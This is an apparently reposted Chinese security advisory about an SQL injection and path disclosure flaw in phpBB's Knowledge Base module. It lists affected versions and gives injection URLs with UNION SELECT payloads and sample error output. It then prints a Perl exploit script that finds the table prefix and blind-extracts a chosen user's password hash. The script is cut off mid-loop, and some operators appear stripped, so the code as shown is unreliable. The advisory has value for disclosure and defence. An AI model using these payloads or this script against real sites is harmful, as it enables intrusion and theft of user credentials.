phpBB Knowledge Base模块SQL注入和完整路径泄露…

发布日期：2005-04-19
更新日期：2005-04-19

受影响系统：

phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0

描述：

---

BUGTRAQ ID: 13219

phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序，使用较为广泛。它支持多种数据库作为后端，如Oracle、MSSQL、MySql、PostGres等等。

phpBB的Knowledge Base模块中存在SQL注入漏洞，远程攻击者可能利用此漏洞非法操作数据库。

起因是应用程序在SQL请求中使用用户输入之前没有正确的过滤输入。如果用户能够提供如下输入的话：

/kb.php?mode=cat&cat='

就可得到类似的错误消息：

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php

/kb.php?mode=cat&cat=0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users WHERE 1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users
Match: DEBUG MODE - SQL-Error

成功利用该漏洞可能导致入侵应用程序，泄漏或修改数据等。

<*来源：deluxe89 （deluxe@security-project.org）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111384185116335&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#
# Discovered by [R] and deluxe89
# Exploit by deluxe89
#########################
\n";

if($#ARGV < 2)
{
print "Usage: ./phpbb_kb.pl host path userid [proxy:port]\n";
print "Example: ./phpbb_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
exit;
}


my $debug = 0;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';


my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
print "[ ] Using a proxy\n";
}
else
{
print "[ ] You're using NO proxy!\n";
sleep(3);
}



#
# Get the table prefix
#

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

while(<$sock>)
{
if($_ =~ m/FROM (\w )kb_categories/)
{
$prefix = $1;
print "[ ] Table prefix: $prefix\n";
last;
}
}
if($prefix eq '')
{
die("[-] Getting the table prefix failed.\n");
}




#
# Getting the hash
#

print "[ ] Getting the hash. Please wait some minutes..\nHash: ";


my $hash = '';
for(my $i=1;$i<33;$i )
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c )
{
if(&test($i, $c, 1))

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有